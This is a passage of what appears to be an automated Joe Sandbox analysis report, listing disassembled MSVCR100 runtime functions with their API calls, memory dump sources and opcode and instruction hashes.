                                                                                                          • Instruction Fuzzy Hash: 4CE0D836681329EBC7A12F6CDC02E8A3764AF497A4F054221F8949F2D0DB72F84047F0
                                                                                                          Function 6FDC6F18 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetThreadPriority.KERNEL32(?,?), ref: 6FDC6F32
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC6F3C
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC6F54
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000), ref: 6FDC6F62
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0scheduler_resource_allocation_error@Concurrency@@ErrorExceptionLastPriorityThreadThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2064810379-0
                                                                                                          • Opcode ID: 8ebd303bc21588e418c8aaff75088ecb4ec5082bad789d48595fefb712dfd2d0
                                                                                                          • Instruction ID: d7d09917be5023dae0b3550a886cc76070b07e60bd44d8c895e2df4c1b0d99cb
                                                                                                          • Opcode Fuzzy Hash: 8ebd303bc21588e418c8aaff75088ecb4ec5082bad789d48595fefb712dfd2d0
                                                                                                          • Instruction Fuzzy Hash: F7F0E57150430ADFEB54DFA4C805E7E3BACBF01320B144629E419DB2A1EB34F910CA91
                                                                                                          Function 6FDD6DDB Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FDD6DF3
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FDD6DFE
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock_file.MSVCR100(00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FDD6E0B
                                                                                                          • _ungetc_nolock.MSVCR100(?,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FDD6E1B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo_lock_file_ungetc_nolock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3962069902-0
                                                                                                          • Opcode ID: 1d1134c8bf9bb55198603df21f664d31bce003c28146caf251ab5fedaa5ad712
                                                                                                          • Instruction ID: 12ca39307251cc3ffffe7dbe41f39c3add4bd350960a9770a217a778441a46f4
                                                                                                          • Opcode Fuzzy Hash: 1d1134c8bf9bb55198603df21f664d31bce003c28146caf251ab5fedaa5ad712
                                                                                                          • Instruction Fuzzy Hash: 48F01231801305EADB816FB5E80564D3760AF01379F10D315F0349A0D0DB35B5419B60
                                                                                                          Function 6FDFAD5F Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDFAD6C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFAD77
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • wcslen.MSVCR100(?), ref: 6FDFAD81
                                                                                                          • _wmktemp_s.MSVCR100(?,00000001,?), ref: 6FDFAD89
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo_wmktemp_swcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1562557449-0
                                                                                                          • Opcode ID: 99062d200fcfb6ed1082185d1f08413a0b919caf456ae38ec21520c598fdd896
                                                                                                          • Instruction ID: 98dd0314fcbcb0009c67728e2660abcd41be1c7801ab5945e4281045ab164813
                                                                                                          • Opcode Fuzzy Hash: 99062d200fcfb6ed1082185d1f08413a0b919caf456ae38ec21520c598fdd896
                                                                                                          • Instruction Fuzzy Hash: D6E0C27AA92328A696812BB4AC00EAA374CCE027ADB065120EC19DB180EB19B90241F1
                                                                                                          Function 6FDFABC4 Relevance: 6.0, APIs: 4, Instructions: 26stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDFABD1
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFABDC
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • strlen.MSVCR100(?), ref: 6FDFABE6
                                                                                                          • _mktemp_s.MSVCR100(?,00000001,?), ref: 6FDFABEE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo_mktemp_sstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3626312056-0
                                                                                                          • Opcode ID: f6d66a9ad4ada94d6beb3cc3d5069093c07562e612d195fa57a20ee7d6c36b73
                                                                                                          • Instruction ID: 47b5b36ef267cb08de8013c0d533eb65fa89ea906b3e0a1a5191ef387fb1d9d7
                                                                                                          • Opcode Fuzzy Hash: f6d66a9ad4ada94d6beb3cc3d5069093c07562e612d195fa57a20ee7d6c36b73
                                                                                                          • Instruction Fuzzy Hash: 00E0C2729A622D7A86912BB59C00DAA335CCE427A8B4A1221A819DB180DF29B90241F2
                                                                                                          Function 6FDCA0F0 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • TlsAlloc.KERNEL32(?,?,?,6FDC00D5), ref: 6FDCA0F8
                                                                                                          • GetLastError.KERNEL32(?,?,?,6FDC00D5), ref: 6FDCA108
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000,?,?,?,6FDC00D5), ref: 6FDCA120
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000,?,?,?,6FDC00D5), ref: 6FDCA12E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0scheduler_resource_allocation_error@AllocConcurrency@@ErrorExceptionLastThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2232697313-0
                                                                                                          • Opcode ID: c0b59969a39a6fb4086473b4d83d8bb45d92d6de9847f315b34715988c221471
                                                                                                          • Instruction ID: 2a9b1315fd8d826a4c28b049d4d3c1d737fd286c32294ca1c66305eb1528db55
                                                                                                          • Opcode Fuzzy Hash: c0b59969a39a6fb4086473b4d83d8bb45d92d6de9847f315b34715988c221471
                                                                                                          • Instruction Fuzzy Hash: 0AE086718047579AEB80ABB4CC1AA6E3BACBE42734F544B25E521E60D0EB38F1195662
                                                                                                          Function 6FE007A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDFFE57: $I10_OUTPUT.MSVCR100(?,?,00000016,?,?,?,6FE00196,00000000,?,?,000000FF,00000016,?,?,000000A3,?), ref: 6FDFFE98
                                                                                                            • Part of subcall function 6FDFFE57: strcpy_s.MSVCR100(6FE00196,?,?,?,?,00000016,?,?,?,6FE00196,00000000,?,?,000000FF,00000016,?), ref: 6FDFFEB8
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6FE007D7
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6FE007DE
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: I10__errno_invalid_parameter_invalid_parameter_noinfostrcpy_s
                                                                                                          • String ID: -
                                                                                                          • API String ID: 4208928170-2547889144
                                                                                                          • Opcode ID: fbaa3fa7cfa2a39fd4be749c5dcf60c20772c2e0f08856f48e01b784eeaab9c0
                                                                                                          • Instruction ID: d2ca3266a9e6a406d0252e8bc72a761229f9e014ce2b30acc81b330b6f347474
                                                                                                          • Opcode Fuzzy Hash: fbaa3fa7cfa2a39fd4be749c5dcf60c20772c2e0f08856f48e01b784eeaab9c0
                                                                                                          • Instruction Fuzzy Hash: 4F31C132900209ABCF16AF68CC40DEE7F75BF49324F145259FA11A7290E731E961CBB1
                                                                                                          Function 6FE00162 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDFFE57: $I10_OUTPUT.MSVCR100(?,?,00000016,?,?,?,6FE00196,00000000,?,?,000000FF,00000016,?,?,000000A3,?), ref: 6FDFFE98
                                                                                                            • Part of subcall function 6FDFFE57: strcpy_s.MSVCR100(6FE00196,?,?,?,?,00000016,?,?,?,6FE00196,00000000,?,?,000000FF,00000016,?), ref: 6FDFFEB8
                                                                                                          • _errno.MSVCR100(?,?,?,?,000000A3,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6FE0019D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,000000A3,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6FE001A4
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: I10__errno_invalid_parameter_invalid_parameter_noinfostrcpy_s
                                                                                                          • String ID: -
                                                                                                          • API String ID: 4208928170-2547889144
                                                                                                          • Opcode ID: 68573209cc075aeb74d920635d51a438b869cc02bc537de2a21367ba5873f22b
                                                                                                          • Instruction ID: f0d16a9c8bd0fc818ebd8e4b5787cd3dba9c8d591e2167ee324718412d8e05d8
                                                                                                          • Opcode Fuzzy Hash: 68573209cc075aeb74d920635d51a438b869cc02bc537de2a21367ba5873f22b
                                                                                                          • Instruction Fuzzy Hash: DB219876A0020AABDB099F78CC41EDF7B69EF49354F15861AF522E72C1E731E920C761
                                                                                                          Function 6FDBAF92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDB614A: TlsGetValue.KERNEL32(?,6FDC5442,00000004,6FDC5D63,?,?,00000000,?,?,?,6FDC5C6B,00000001), ref: 6FDB615F
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6FDBAFC4
                                                                                                            • Part of subcall function 6FDF35FA: ?_Copy_str@exception@std@@AAEXPBD@Z.MSVCR100(6FDC2115,?,?,6FDC2115,6FDC1F83,?,6FDC1F83,00000001), ref: 6FDF3615
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20CE0,?), ref: 6FDBAFD9
                                                                                                            • Part of subcall function 6FD986E8: RaiseException.KERNEL32(?,?,6FDAF30F,?,?,?,?,?,6FDAF30F,?,6FD8C888,6FE28518), ref: 6FD98727
                                                                                                          Strings
                                                                                                          • Lock already taken as a writer, xrefs: 6FDBAFBD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception$??0exception@std@@Copy_str@exception@std@@RaiseThrowValue
                                                                                                          • String ID: Lock already taken as a writer
                                                                                                          • API String ID: 3544620089-3737755527
                                                                                                          • Opcode ID: 5bbc8301c5242f49fe504ca1d62fb11c342423446a3bfe5ea8149733bb6342e9
                                                                                                          • Instruction ID: 9ae25dcbf97f0e3cc8c46d81a2b6dfeee1c1e717bdabb17539148a829514821e
                                                                                                          • Opcode Fuzzy Hash: 5bbc8301c5242f49fe504ca1d62fb11c342423446a3bfe5ea8149733bb6342e9
                                                                                                          • Instruction Fuzzy Hash: 8B216FB1A00315DFCB51CFA4C895AAAB3B4FF86364F50465ED533AB290DB30B946DB90
                                                                                                          Function 6FDCBE58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,6FE27C68,00000104,?,?,?,?,?,?,6FDA7432), ref: 6FDCBE76
                                                                                                          • _malloc_crt.MSVCR100(?,?,?,?,?,?,?,6FDA7432), ref: 6FDCBEC4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileModuleName_malloc_crt
                                                                                                          • String ID: h|o
                                                                                                          • API String ID: 2373854079-2772395301
                                                                                                          • Opcode ID: 98b41f02b2b40b178df9cbc76d0c0d4921b2a63bee6c5456dceb83c533687d1b
                                                                                                          • Instruction ID: d50a15f84aef972656575f738598d003c035d0d678ecf385b43e508512f69ca2
                                                                                                          • Opcode Fuzzy Hash: 98b41f02b2b40b178df9cbc76d0c0d4921b2a63bee6c5456dceb83c533687d1b
                                                                                                          • Instruction Fuzzy Hash: CB11B471605314EBDB14CB749881A9E3BACDB47770F100656E611D72C0EB71FA018761
                                                                                                          Function 6FD8C498 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _calloc_crt.MSVCR100(00000004), ref: 6FD8C4BC
                                                                                                          • _calloc_crt.MSVCR100(00000014,00000004), ref: 6FDA8875
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _calloc_crt
                                                                                                          • String ID: x0o
                                                                                                          • API String ID: 2398442801-1005245174
                                                                                                          • Opcode ID: 9c83db01d37ec8c18d81ad4431594df26fd87d66e7a79515c92e2cd31898ad90
                                                                                                          • Instruction ID: fa371a08d5e6aeea378b5750536c83f50c90ad1770551109a3726d8fb6aaebcc
                                                                                                          • Opcode Fuzzy Hash: 9c83db01d37ec8c18d81ad4431594df26fd87d66e7a79515c92e2cd31898ad90
                                                                                                          • Instruction Fuzzy Hash: 3711E631208B419EE7494B3DAC52A693BA26B87234728036BE535CB2D5FA20B4918624
                                                                                                          Function 6FDD6407 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _flsbuf.MSVCR100(00000000,?), ref: 6FDD6471
                                                                                                            • Part of subcall function 6FD8ED1C: _fileno.MSVCR100(6FD908FE,?,?,?,6FD908FE,00000040,?), ref: 6FD8ED27
                                                                                                            • Part of subcall function 6FD8ED1C: _write.MSVCR100(6FD908FE,FFFF9B4B,00000000,00000000,6FE245D0,?,?,?,6FD908FE,00000040,?), ref: 6FD8ED95
                                                                                                          • _flsbuf.MSVCR100(00000000,?), ref: 6FDD6489
                                                                                                            • Part of subcall function 6FD8ED1C: _lseeki64.MSVCR100(6FD908FE,00000000,00000000,00000002,00000000,6FE245D0,?,?,?,6FD908FE,00000040,?), ref: 6FDA8928
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _flsbuf$_fileno_lseeki64_write
                                                                                                          • String ID: B
                                                                                                          • API String ID: 3565827689-1255198513
                                                                                                          • Opcode ID: 680ad904007144912a9b1a7e1fa8f61bcd9ceab09c4def93468c7bb7dfc554c2
                                                                                                          • Instruction ID: e73e84385cd691ec51b36436b6b10769fa20b92f62a049ffafeb03a905b63ded
                                                                                                          • Opcode Fuzzy Hash: 680ad904007144912a9b1a7e1fa8f61bcd9ceab09c4def93468c7bb7dfc554c2
                                                                                                          • Instruction Fuzzy Hash: 0E111F72D0825D9FDF41CFE8D8419EEB7B8EB09314F144527F920E7281E639A9058BB4
                                                                                                          Function 6FDF44C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __BuildCatchObject.MSVCR100(00000000,csm,6FDB2708,00000000,csm,6FDF461A,?,6FDB2708), ref: 6FDF44D7
                                                                                                            • Part of subcall function 6FDF4414: __BuildCatchObjectHelper.MSVCR100(?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF444A
                                                                                                            • Part of subcall function 6FDF4414: __AdjustPointer.MSVCR100(?,00000008,00000001), ref: 6FDF4461
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuildCatchObject$AdjustHelperPointer
                                                                                                          • String ID: csm$csm
                                                                                                          • API String ID: 1575089355-3733052814
                                                                                                          • Opcode ID: 1555a1045114a47500af0669301964cadd000cb4c095651f30038b46b45f4f3c
                                                                                                          • Instruction ID: 1e9f4417cffa603aa59f9ee54386959e68ef622b3c75bf4097258d82496e569d
                                                                                                          • Opcode Fuzzy Hash: 1555a1045114a47500af0669301964cadd000cb4c095651f30038b46b45f4f3c
                                                                                                          • Instruction Fuzzy Hash: BE01E835002209BBDF525F51CD41EEB7F6AFF05354F028011BD1825164D776A9B2DBA1
                                                                                                          Function 6FDD5F4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD5F68
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD5F73
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID: I
                                                                                                          • API String ID: 340685940-3707901625
                                                                                                          • Opcode ID: 1e0523bbef8c0f7e8522fd0dcf289931d6bba9ddf4524dc04e41bdf17f5846a9
                                                                                                          • Instruction ID: 17f00305c258e9d5e4af27dfbaffed7ba3b813255c57b8de9a2ed25f7f2a3282
                                                                                                          • Opcode Fuzzy Hash: 1e0523bbef8c0f7e8522fd0dcf289931d6bba9ddf4524dc04e41bdf17f5846a9
                                                                                                          • Instruction Fuzzy Hash: 5F012C71C0020ADBDF109FA9D804AEEBBB5EF84328F508715E534AA1D0EB75A2158BA5
                                                                                                          Function 6FDD5E30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD5E4C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD5E57
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
